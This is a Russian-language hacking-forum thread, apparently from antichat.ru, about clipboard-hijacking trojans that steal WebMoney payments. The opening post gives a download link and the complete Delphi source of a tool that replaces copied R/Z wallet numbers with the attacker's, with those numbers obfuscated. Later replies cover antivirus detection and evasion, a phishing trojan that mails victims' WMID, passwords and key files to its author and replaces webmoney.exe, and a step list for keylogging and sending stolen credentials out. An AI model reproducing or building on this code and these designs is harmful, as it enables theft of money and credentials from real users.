Написал небольшую программку. Суть такова: висит себе тихонько на компе жертвы, при копировании в буфер обмена номера R или Z кошелька (ИМХО самый распространенный метод ввода кошелей в кипер) заменяет их на заранее заготовленные номерки. В итоге жертва вставляет не скопированный, а Ваш номер кошеля :)
В программе для демонстрации вшиты кошельки

R123456789101
Z123456789101

(придумал наобум)

скачать (http://www.kbrdhook.com/downloads/wmb.rar)

Пароль: antichat.ru

Если понравится, выложу исходники (Писал на Delphi + KOL).

Хочу предупредить, что программа написана в целях демонстрации опасности данного метода обмана пользователя, а не, собственно, обмана :)

Сорцы скинь..

Joker-jar смотри 4 анивиря палят его!

AhnLab-V3 2007.6.21.1 06.21.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.21.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.20.2007 no virus found
BitDefender 7.2 06.21.2007 no virus found
CAT-QuickHeal 9.00 06.21.2007 no virus found
ClamAV devel-20070416 06.21.2007 no virus found
DrWeb 4.33 06.20.2007 no virus found
eSafe 7.0.15.0 06.20.2007 suspicious Trojan/Worm
eTrust-Vet 30.8.3730 06.20.2007 no virus found
Ewido 4.0 06.20.2007 no virus found
FileAdvisor 1 06.21.2007 no virus found
Fortinet 2.91.0.0 06.21.2007 no virus found
F-Prot 4.3.2.48 06.21.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 no virus found
Ikarus T3.1.1.8 06.21.2007 Trojan.Delf.NEB
Kaspersky 4.0.2.24 06.21.2007 no virus found
McAfee 5057 06.20.2007 no virus found
Microsoft 1.2607 06.21.2007 TrojanDownloader:Win32/Small.OE
Norman 5.80.02 06.20.2007 no virus found
Panda 9.0.0.4 06.20.2007 Suspicious file
Prevx1 V2 06.21.2007 no virus found
Sophos 4.18.0 06.12.2007 no virus found
Sunbelt 2.2.907.0 06.09.2007 no virus found
Symantec 10 06.21.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.20.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found

Стоит вопрос ты туда больше не чего не впарил?

Но за идею молодец!(хорошая идея!)

Не впарил. А вот беда паблика в том, что первым делом все попадает на вирустотал => в базы антивиров. Вы что, вообще не доверяете антивиру, который стоит на Вашей машине?

Такое уже было.
ЗЫ. Перенесено в С/С++/Дельфи/Асм

Посчитал, что закрывать все-таки не стоит =)

=) Гы, спс! Исходник программы:

program wmb;

uses
Windows, KOL;

const
wmr = '\?<=:;8967?>?'; // hidestring('R123456789101', 14)
wmz = 'G,/.)(+*%$,-,'; // hidestring('Z123456789101', 29)

type
Twm = (Unknown, R, Z);

var
Timer: PTimer;
Mes: msg;

function hidestring(s: string; code: integer): string;
var
t: Integer;
begin
for t:=1 to Length(S) do S[t]:=Chr(Ord(S[t]) xor Code);
Result:=S;
end;

function getwmtype(s: string): Twm;
var
c: char;
e: integer;
i: int64;
begin
result := Unknown;
c := upcase(s[1]);
if (length(s) <> 13) and (c <> chr($52)) and (c <> chr($5a)) then
exit;
if c = chr($52) then
result := R
else
result := Z;
delete(s,1,1);
val(s,i,e);
if e <> 0 then
result := Unknown;
end;

procedure OnTimer(Sender: PControl);
var
s: string;
begin
if getwmtype(Clipboard2Text) = R then
Text2Clipboard(hidestring(wmr, 14))
else
if getwmtype(Clipboard2Text) = Z then
Text2Clipboard(hidestring(wmz, 29));
end;

begin
Timer := NewTimer(200);
Timer.OnTimer := TOnEvent(MakeMethod(nil,@OnTimer));
Timer.Enabled := true;
while (GetMessage(Mes, 0, 0, 0)) do
begin
TranslateMessage(Mes);
DispatchMessage(Mes);
end;
end.


Хоть, как сказал _Great_, такое уже было (я видать в то время под стол ходил), думаю, не все знают о данной фишке. Попасться реально легко (не считая сложностей впаривания), будьте внимательны

Joker-jar > можно и на чистый WinAPI переделать (see SetTimer).

я гдето уже видел подобное.
Прога поддерживала рабту с: WM: Z, R, E, U, yandex, e-gold
И звалась она помойму WmSpy

Вот тока много толку от этоге может и небыть.
Потому что после того как человек заметит что деньги ушли кудато не туда.
То он посмотрит историю платежей, где будет светится твой кошелек.
И потом могут быть проблемы с этим.

я гдето уже видел подобное.
Прога поддерживала рабту с: WM: Z, R, E, U, yandex, e-gold
И звалась она помойму WmSpy

Вот тока много толку от этоге может и небыть.
Потому что после того как человек заметит что деньги ушли кудато не туда.
То он посмотрит историю платежей, где будет светится твой кошелек.
И потом могут быть проблемы с этим.
А я про что ))) Так что эти трояны так побаловатся.... к примеру на друзьями )))

http://forum.antichat.ru/thread40090.html -- тут тоже самое только на C

эти трояны так побаловатся
ога...а потом блэки с логами...
-"Я перевел тебе деньги!"
-"Я ничего не получал...Все пишу блэк..."
З.Ы.:с подменой кошелей в буфере не писал трои только ленивый...^_^

У меня 2 таких троя на делпхи на визуалбайсик. 1-здесь нет остальных кошельков U,B,E.
2-Она некопируеца в системные папки и незалезает в авто запуск и непрячется от Alt+Ctrl+Del. Так что это трой безпозлезно распространять. Он тока на один раз запуска троя.Все трои с заменой кошелей старые им уж года 3 как я помню.

Радует то, что большинство знают о данной шалости. Если есть подозрения на то, что комп спидозный, обязательно смотрите что копируете, а что вставляете (одного раза может вполне хватить).

З.Ы. Согласен, что прога не годится для практических действий, но я этого и не добивался =)

2 vii долбаеп зачем на тотал то сувать?

2 vii долбаеп зачем на тотал то сувать?Во первых зря ты оскорбил человека.
Это его личное дело , что , где и как проверять.

Во вторых , автор выложил исходники , кому нужно подправят и перекомпилят.

В третьих , лучше будет продаваться твой безпалевный криптор.

В четвертых , не нравятся антивирусы и фаерволы, отсылай на проверку их системные файлы, пуст палят друг друга.

Народ хотел спросить совета. Я написал wm троя на делфи с оригинальным дизайном самой webmoney тока при вводе wmid и паса все приходит мне на мыло и ключи kwm и пасс кнему тоже на мыло сливается. При запуске автоматическии заменяет оргинал в webmoney.exe на троян. и тд. Но есть одно но, файл трояна весит 244кб в зжатом состоянии сжимал Upack. Как зделать размер поменьше чтоб на лоадер можно было ставить?. Можно ли готовый проэкт переделать в KOL. Кто знает как все это замутить.

2 X-zone Ты попробуй сделать чуть по другому.
Пусть твой троян будет очень маленький. и его функции быдут такими:
1) стырит ключь
2) запустит реальный WM и поставит на него ловушку для клавы
3) стырит пас.
4) отошлет все на мыло.

Тем самым размер - мининум. и работоспособность не теряется

slesh, а разве в WM кипере нету антихука?

2 X-zone Ты попробуй сделать чуть по другому.
Пусть твой троян будет очень маленький. и его функции быдут такими:
1) стырит ключь
2) запустит реальный WM и поставит на него ловушку для клавы
3) стырит пас.
4) отошлет все на мыло.

Тем самым размер - мининум. и работоспособность не теряется


Я в курсе про этот алгоритм работы это будет следующая моя прога.Но дело в том чтоя хочу оптимизировать этот проект который зделал невыкидвать же его тока изза больщого размера.Пока его некто непалит вот что хорошо.

244кб на лоадер - это слишком много? сколько вообще на лоадер можно мах ставить?

На лоадер чем меньше тем лучше желетельно от 1байта до 100кб золотая середина.

эмм... А в свой кошель-то чел зайдет вместе с твоим троем? Или это чисто как обманка?
Сделай какой-нить фейк, имитирующий заход в wmid.

хм...недавно отправлял деньги и забыл поставить букву Z перед кошельком (копировал из буфера), стер, и копировал правильно, но кипер ругнулся что произошла подмена кошельков или что то в этом роде
как ты решил эту проблему?

как ты решил эту проблему?
Дык подмена происходит прямо в буфере...а не в полях ввода кипера...а вот если подменивать в полях ввода,то тогда кипер будет ругаться...(%
З.Ы.:сейчас уже трои с автозаливом WM есть...причем картинки убираются легко и просто :P Но если такой трой попадет в пабл,то писец =\

У меня самого такой обнаружился - долго матерился, когда ни один антивирь не брал его.

Это и есть фэйк мой трой имитирует вход в webmoney с вводом wmid и пароля после ввода идет отправка на мыло потом открываекца окно где нада указать ключь и написать пасс к нему и все это идет на мыло тоже. Дизайн ничем неотличаеца от оригинала вебмоней тока нада размеры снизить и троян будет завершен.